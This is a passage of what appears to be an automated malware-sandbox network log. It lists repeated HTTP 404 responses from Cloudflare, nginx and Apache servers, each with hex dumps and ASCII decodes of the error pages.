6c 4e 42 6f 6e 2b 52 77 3d Data Ascii: DrelH=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFAScUTzHZ/RPOenY0sZTMI0KnYDr+klJGklNBon+Rw=
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:57:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g17BlI2XQDR7Yw4E2bZjNqXNLYUGG6gDzX9YiuUwyut7cLBegf0T4C0Ug02aDn2WopUjAv9PHYI%2BnQL%2FhsS0ZPolswgDJnbqw4%2FrUbbmDSKjtFDyf2nhnZ5vmrXdo4a4W1WTgQfQ6Obu4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6c663bc80d4662-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1288&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e b1 0a c2 30 10 86 f7 42 df e1 dc 74 68 d3 40 07 87 23 8b 28 38 e8 22 3e 40 ea 9d 4d 20 4d 4a 4c c1 be bd 54 2d 88 b3 a3 d3 c1 ff 7f ff c7 a1 49 9d 53 79 86 86 35 29 4c 36 39 56 75 55 c3 31 24 d8 85 c1 13 8a 57 88 e2 89 e4 19 36 81 c6 e9 5e d8 27 8e 0a 8d fc 5e 18 a9 50 bc eb c9 1d d5 0c fb d6 fa bb 90 a5 5c 97 15 2c cf cd e0 d3 b0 fa 64 c5 6c 17 f3 67 8b a2 00 0d bd 26 b2 be 85 14 80 ec 4d 37 8e e1 70 da 6f 41 7b 82 8d 89 a1 63 b8 46 cb 9e dc 08 1c 63 88 d0 eb 96 a1 28 fe 8a 5f 2b 1e 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b70Bth@#(8">@M MJLT-ISy5)L69VuU1$W6^'^P\,dlg&M7poA{cFc(_+*I540
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:57:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFX6P1PjLgt0ExkCo76f%2F44F0yoJ2dKiNxMnfh%2FmxLZV3p2EYxCqwENV5FtDEyuv5hjJauO3OkT8gfRnTvL6CE2JXPqOm6FJ6JLp3%2BUMezX3wSrMs6qSUv5fCkGAlTTbexMw3SaQHpamOA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6c664baf2ce972-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=785&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e b1 0a c2 30 10 86 f7 42 df e1 dc 74 68 d3 40 07 87 23 8b 28 38 e8 22 3e 40 ea 9d 4d 20 4d 4a 4c c1 be bd 54 2d 88 b3 a3 d3 c1 ff 7f ff c7 a1 49 9d 53 79 86 86 35 29 4c 36 39 56 75 55 c3 31 24 d8 85 c1 13 8a 57 88 e2 89 e4 19 36 81 c6 e9 5e d8 27 8e 0a 8d fc 5e 18 a9 50 bc eb c9 1d d5 0c fb d6 fa bb 90 a5 5c 97 15 2c cf cd e0 d3 b0 fa 64 c5 6c 17 f3 67 8b a2 00 0d bd 26 b2 be 85 14 80 ec 4d 37 8e e1 70 da 6f 41 7b 82 8d 89 a1 63 b8 46 cb 9e dc 08 1c 63 88 d0 eb 96 a1 28 fe 8a 5f 2b 1e 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b70Bth@#(8">@M MJLT-ISy5)L69VuU1$W6^'^P\,dlg&M7poA{cFc(_+*I540
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:57:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GmH9ifoe%2FMIhysmT3ZRaPky0FeAqEjW4w8b6A0LMBAjdLg66wwufg8QrKzkwsqUuJ1zgMSLb8HpUQaaMbW0b9L5wXMFtx9Urq52Su2Nt3Jo%2Bqc394ps%2FWYIyuHH3UbvIx%2FAc2G7QqgNrbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6c665c795728ab-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1615&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1802&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e b1 0a c2 30 10 86 f7 42 df e1 dc 74 68 d3 40 07 87 23 8b 28 38 e8 22 3e 40 ea 9d 4d 20 4d 4a 4c c1 be bd 54 2d 88 b3 a3 d3 c1 ff 7f ff c7 a1 49 9d 53 79 86 86 35 29 4c 36 39 56 75 55 c3 31 24 d8 85 c1 13 8a 57 88 e2 89 e4 19 36 81 c6 e9 5e d8 27 8e 0a 8d fc 5e 18 a9 50 bc eb c9 1d d5 0c fb d6 fa bb 90 a5 5c 97 15 2c cf cd e0 d3 b0 fa 64 c5 6c 17 f3 67 8b a2 00 0d bd 26 b2 be 85 14 80 ec 4d 37 8e e1 70 da 6f 41 7b 82 8d 89 a1 63 b8 46 cb 9e dc 08 1c 63 88 d0 eb 96 a1 28 fe 8a 5f 2b 1e 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b70Bth@#(8">@M MJLT-ISy5)L69VuU1$W6^'^P\,dlg&M7poA{cFc(_+*I540
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:57:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LxblphZLuKi7yr2hFSUhe7l7SdJ%2FUHaXwBjvNWaEte2dfIR6%2Fh%2BopK35eJXtGXtjK%2B4n0zr1wG7uKPVBaYfkmVuVexf7xqxLiEA6XBO6K1xtLtQX%2F%2FeJJAdE2C7wEszlOXGhsPl8s6rxQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6c666c7a660b76-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1304&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 33 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 Data Ascii: 234<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:58:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:58:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:58:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 20:58:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 22 Oct 2024 20:58:44 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 22 Oct 2024 20:58:46 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 22 Oct 2024 20:58:49 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 